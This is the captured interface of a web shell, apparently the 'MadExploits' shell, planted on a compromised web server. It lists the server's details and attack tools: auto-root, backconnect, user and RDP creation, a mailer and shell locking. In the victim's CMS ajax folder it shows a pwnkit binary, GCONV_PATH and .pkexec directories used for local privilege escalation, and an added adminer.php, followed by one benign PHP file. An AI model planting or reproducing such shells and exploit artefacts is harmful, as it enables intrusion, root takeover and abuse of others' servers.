Linux cool-chatelet.209-46-124-25.plesk.page 6.8.0-60-generic #63-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 19:04:15 UTC 2025 x86_64
nginx/1.26.3
: 209.46.124.25 | : 216.73.216.5
Cant Read [ /etc/named.conf ]
8.3.21
beghelli.com.mx_t822czighbk
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
vhosts /
beghelli.com.mx /
httpdocs /
cms /
ajax /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminAjax.php
1013
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
agentAjax.php
889
B
-rw-r--r--
agentResourcesAjax.php
0
B
-rw-r--r--
asociationsAjax.php
720
B
-rw-r--r--
catalogAjax.php
1.01
KB
-rw-r--r--
catalogCategoryAjax.php
1.19
KB
-rw-r--r--
categoryAjax.php
1.38
KB
-rw-r--r--
certificationsAjax.php
747
B
-rw-r--r--
cloudAjax.php
1.82
KB
-rw-r--r--
distributorAjax.php
967
B
-rw-r--r--
loginAjax.php
479
B
-rw-r--r--
mapAjax.php
1023
B
-rw-r--r--
mediaAjax.php
743
B
-rw-r--r--
newsAjax.php
664
B
-rw-r--r--
pedritoAjax.php
546
B
-rw-r--r--
productAjax.php
1.28
KB
-rw-r--r--
productCategoryAjax.php
759
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
sliderAjax.php
809
B
-rw-r--r--
successAjax.php
691
B
-rw-r--r--
technicalInformationAjax.php
815
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mapAjax.php
<?php $ajaxRequest = true; require_once "../config/app.php"; require_once "../controller/mapController.php"; $ins_controller = new mapController(); if (isset($_POST['stateId'])) { $stateId = intval($_POST['stateId']); if ($stateId === 'all') { $distribuidores = $ins_controller->get_all_distributors(); } else { $distribuidores = $ins_controller->get_distributors_by_state($stateId); } if (!empty($distribuidores)) { foreach ($distribuidores as $distribuidor) { echo '<div class="distributor">'; echo '<h2>' . htmlspecialchars($distribuidor['name']) . '</h2>'; echo '<p>' . htmlspecialchars($distribuidor['address']) . '</p>'; echo '<p>Teléfono: ' . htmlspecialchars($distribuidor['phone']) . '</p>'; echo '</div>'; } } else { echo '<p>No se encontraron distribuidores para este estado.</p>'; } } else { echo '<p>Error al recibir la solicitud.</p>'; } ?>
Close